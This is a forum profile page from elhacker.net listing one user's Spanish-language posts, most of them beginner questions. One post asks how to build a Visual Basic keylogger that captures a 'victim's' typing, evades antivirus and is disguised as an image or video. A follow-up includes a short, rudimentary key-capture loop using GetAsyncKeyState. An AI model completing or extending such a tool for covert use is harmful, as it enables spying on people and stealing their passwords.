elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1]
1  Foros Generales / Dudas Generales / Re: Temas para empezar en el mundo del hacking en: 6 Enero 2014, 00:28 am
Vale, una buena sugerencia, gracias :)
2  Foros Generales / Dudas Generales / Temas para empezar en el mundo del hacking en: 5 Enero 2014, 21:38 pm
Buenas a todos.
Me gustaría que me pusieran los temas principales para empezar en el mundo del hacking, de esta forma empiezo a averiguar y a aprender mas. Esto lo pido principalmente por que no se que temas necesito para ser un verdadero hacker, y no se por donde es mejor empezar.
Gracias.
3  Programación / Programación Visual Basic / Re: Quiero crear un Keylogger en VB 2008 en: 26 Diciembre 2013, 02:20 am
Soy nuevo en VB, por lo tanto no se mucho de este lenguaje, por ende, no creo que tenga unas bases.

Código:
Public Class Form1
    Dim resultado As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As Integer
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        For i = 1 To 255
            resultado = 0
            resultado = GetAsyncKeyState(i)
            If resultado = -32767 Then
                RichTextBox1.Text = RichTextBox1.Text + Chr(i)
            End If
        Next i
    End Sub
End Class

Si a lo que te refieres es que empiece a leer manuales y a aprender mas de este lenguaje, claro que lo are, si es un requisito para hacer un keylogger. Gracias por tu respuesta.
4  Programación / Programación Visual Basic / Quiero crear un Keylogger en VB 2008 en: 23 Diciembre 2013, 20:38 pm
Hola a todos!
Miren, soy nuevo en esto de programación en VB y estoy empezando a averiguar mas sobre esto de los keyloggers, para que sirven, como funcionan etc. Me gustaría crear un Keylogger en Visual Basic 2008 (La versión que tengo actualmente) en el cual pueda conocer todo lo que la persona o victima escriba en su PC. También me gustaría que no lo detecte ningún virus y poder disfrazarlo como una imagen o vídeo, para que así sea mas fácil de que la persona o victima lo ejecute.
No se si los conceptos que estoy usando sean los correctos, pero lo que pasa es que soy nuevo en programacion con VB.

Gracias.
5  Programación / Desarrollo Web / Re: Que editor de código utilizas? en: 14 Enero 2013, 21:45 pm
Yo uso Html-kit Es excelente editor de paginas web y ademas es fácil de usar!.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines